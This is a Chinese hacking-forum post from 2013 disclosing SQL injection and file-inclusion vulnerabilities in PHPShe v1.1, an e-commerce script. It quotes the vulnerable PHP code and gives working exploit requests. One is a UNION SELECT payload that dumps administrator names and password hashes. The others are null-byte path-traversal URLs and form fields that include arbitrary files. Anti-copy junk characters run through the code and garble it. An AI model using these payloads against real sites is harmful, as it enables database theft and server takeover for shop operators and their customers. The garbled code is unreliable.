找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2073|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/9 A/ {  t0 s$ T8 K
/* Phpshe v1.1 Vulnerability  W& ?  ^) n4 C1 [/ d  B9 ~: H5 Z
/* ========================6 n2 n8 ^1 H0 Q2 P1 j. `5 G
/* By: : Kn1f3, l0 [, k" {* V2 F8 Z0 u1 O' \
/* E-Mail : 681796@qq.com
. v; E8 l# i/ P) a; o9 B$ A6 u/*******************************************************/
/ B& M5 f5 b& D, T0×00 整体大概参数传输
0 ?" @5 e9 @7 F, _$ i* T7 Q 4 X' o1 ?8 U! v9 Z2 @% s
7 K8 J0 V) S, K
+ [' d+ `# A. |! U8 T" F
//common.php0 F8 g) p1 R% {& i' |
if (get_magic_quotes_gpc()) {
- h2 i$ g5 i  _!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');+ ^6 T; ~0 Z: |& T; I0 X
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');" V; Q& q$ L0 {) r9 W9 A7 D
}
7 s" R% K* r4 S- Telse {0 y5 Y! _4 [6 j' X# U- a8 ]
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');8 o+ t$ W) k# f2 C' ]
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
, G& _# d3 j/ u}
5 o. j% w$ E! @session_start();
$ Z+ H4 _% a. E. O9 D" t: X0 [!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');- f+ Y  F1 p3 Q0 m2 u
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');" z/ d- |1 U( B) g
/ u$ b' D1 @. B4 F' W" m
0×01 包含漏洞
+ f- E' D9 q& ~9 s 3 M3 F) `0 n. g
( Z, z0 @0 F& b" c
//首页文件
' L, f% ^$ X; W<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);6 @  k+ n+ G5 }
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
4 J! {/ S% L/ C4 B: I/ ?pe_result();' E8 o3 D! M8 c5 X- N
?>$ ?) |$ e# F2 g
//common 文件 第15行开始
7 ^, v1 A5 f8 ]1 v/ murl路由配置
8 L6 |# V7 ]4 f1 ~( [! M. u& \1 d7 O# ?$module = $mod = $act = 'index';. W# A8 S* n" h- \) |# i
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);$ x, A! \6 U3 Q3 ?4 I
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);7 D* B# w+ g4 y! F, R" y! l2 ?
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);5 z, ^* N* A( N
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%006 Z0 z6 p! v9 E! v; I


  B2 E( ?! a5 b! d; o) W
0 P+ p, H, [0 O! [ 0×02 搜索注入# a  h- D3 r2 E0 v8 C4 ?9 k3 A

4 Y/ `) ]7 y. J' T2 J% S6 d9 ]<code id="code2">

//product.php文件
$ o8 Z' O8 ~5 I* lcase 'list':; w- {$ Q+ q2 D
$category_id = intval($id);: d+ [8 S0 y7 I
$info = $db->pe_select('category', array('category_id'=>$category_id));
/ l9 U. j% f( b$ ~$ J//搜索  |5 q# t6 a; |
$sqlwhere = " and `product_state` = 1";
+ v7 ]- W( I3 o& E& v# k/ s. z6 ype_lead('hook/category.hook.php');, F! g; E, M! D( v8 ]1 C1 C1 E. [
if ($category_id) {0 X( Z+ e( a8 T
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";6 ^$ l- I3 V$ D3 s+ H
}  ^" r# u% j8 d) _  {
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
! u  I+ {  C: B1 Rif ($_g_orderby) {8 k9 q/ K% o7 C$ x& ^/ N8 x
$orderby = explode('_', $_g_orderby);9 w4 [7 [5 Z" Q( x& N
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";8 S7 e4 p6 k3 W% L  B4 W6 B
}
; \6 S" u" N. P9 r5 F5 melse {
! x5 [! d7 A4 w: C) J, k$sqlwhere .= " order by `product_id` desc";0 M& u( r2 g( ^
}
' E6 G% ?& G' g+ A  O; B" z$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
* c' a  e5 I' F3 j, Z% T; i//热卖排行
- _; d0 p; X# _. e$product_hotlist = product_hotlist();
5 t, @" ]) c, z//当前路径2 r( s" |+ A' M& ], U: Y  H
$nowpath = category_path($category_id);
* {0 [+ k7 M5 ?7 m$seo = pe_seo($info['category_name']);
0 I+ _8 l  M- x" |5 N$ Zinclude(pe_tpl('product_list.html'));; f: W0 a9 l& j3 G; R+ A
//跟进selectall函数库
4 L/ L; \  ^8 T2 |5 n: Ypublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())/ P0 z5 w( S! M6 z& X
{% p7 g3 k9 U, |! O5 W
//处理条件语句+ O7 Q/ g5 n0 L' _5 J" f
$sqlwhere = $this->_dowhere($where);, B0 v7 t1 @0 x" U4 y
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
2 l8 ~, N5 U# j' M( x+ r}3 S2 {( p1 K- C1 s' |0 f
//exp
1 a; e( O# ~; o, Y$ q0 Hproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
) T+ d1 m) ^& i5 h7 E2 Y

</code>8 l& B* }7 a" ^5 k8 I3 n4 `2 g# N, o
6 r" B  z* b3 X8 ~
0×03 包含漏洞2' K5 `. O, I3 ~2 }5 ^1 \
- m0 K3 D  [- o, g& |3 \6 \+ \
<code id="code3">

//order.php

case 'pay':


5 N/ |/ U9 C- e. I% w. u$order_id = pe_dbhold($_g_id);


3 p% V3 M7 W- L- k- q$cache_payway = cache::get('payway');

# d' Q8 Z0 p! d4 i7 R/ l6 b
foreach($cache_payway as $k => $v) {


6 e- @& m! n+ |+ e; [% ^3 t+ L$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


7 Q+ o0 s9 M, ?8 p3 n( E# Nif ($k == 'bank') {


  R+ _# Y, x9 |# T0 M; x6 g8 S$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

. k+ n; [& @0 S: ~
}


4 N5 S9 s; Q8 E. t5 c5 L) k& q}


4 N, k  c; Q" R* \$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


3 I2 w& o! ]7 F% y9 b% l3 F" E* [!$order['order_id'] && pe_error('订单号错误...');

) M+ E/ j0 }: `5 u6 l6 o2 N
if (isset($_p_pesubmit)) {


4 |2 J" @4 q' E' z. Bif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


' V2 X2 s( I2 P' f3 j, p( j  K$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


, c3 y* x( I& C* ]9 [2 _. jforeach ($info_list as $v) {

3 p0 {) w$ l1 o  H/ m% m. V4 J
$order['order_name'] .= "{$v['product_name']};";
% m, V) Z' k, [! q


0 J- e6 C8 q( K0 A}

0 B5 @& B5 @, E5 ?! {3 `$ R
echo '正在为您连接支付网站,请稍后...';

1 E" l! U6 l! J/ E# L2 L
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

' s( b# Z. }4 j$ W8 t, _. U# U
}//当一切准备好的时候就可以进行"鸡肋包含了"

: |: Z% }! G# h1 ^2 y
else {

9 @# O0 E  f9 p% z* \! P: {
pe_error('支付错误...');

2 b: l  b: P/ ?/ h1 X
}


3 |! ?: y2 q9 H6 V- x8 l* \1 x}


5 z6 Q/ U( ^7 R! s/ Q& w$seo = pe_seo('选择支付方式');

/ ^7 S" q1 B+ y! S
include(pe_tpl('order_pay.html'));


: u( J. z8 F% K3 B5 d" ybreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
& d6 H& u( @/ e) w+ X1 Ghttp://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表